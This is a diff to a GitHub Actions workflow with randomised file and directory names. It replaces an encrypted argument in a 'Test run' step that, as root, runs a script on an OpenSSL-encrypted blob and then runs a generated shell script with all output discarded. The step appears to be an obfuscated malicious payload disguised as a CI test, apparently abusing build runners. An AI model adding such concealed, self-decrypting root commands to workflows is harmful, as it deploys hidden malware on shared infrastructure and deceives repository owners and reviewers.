--- a/.github/workflows/uecyp.yml
+++ b/.github/workflows/uecyp.yml
@@ -29,6 +29,6 @@ jobs:
     - name: Test run
       run: |
         cd ${{ github.workspace }}
-        echo 'ckxom'
+        echo 'no59l'
         sudo chmod +x johns2xqp/field806dx/piersonteqsh/rubiox050l.js
-        sudo ./johns2xqp/field806dx/piersonteqsh/rubiox050l.js U2FsdGVkX1/7+th+s1cQ6Z7dKAZcGqq6gLeknfQpSrcbkd3rEv/HKlWqx0LbRFc51R6UkpJbeLNV8AMHtilOiVwymMyr2hyPtbEw6rhQXwLdZ1U9hCuEPsQ9qHXZMExn z8v1fs && sudo sh r.sh > /dev/null 2>&1
+        sudo ./johns2xqp/field806dx/piersonteqsh/rubiox050l.js U2FsdGVkX18jVMXBQ6OLNVM6WbmDxorq6pV3YUGZnHSxFMWMyQ+76VBQsV6hBQBTSixvjkcj64JbcYVQvkVyxHOLBmHe+yl79RNJmSgIEd55D71qjbIlDTw4TW+1AgXg 6fw2uf && sudo sh r.sh > /dev/null 2>&1
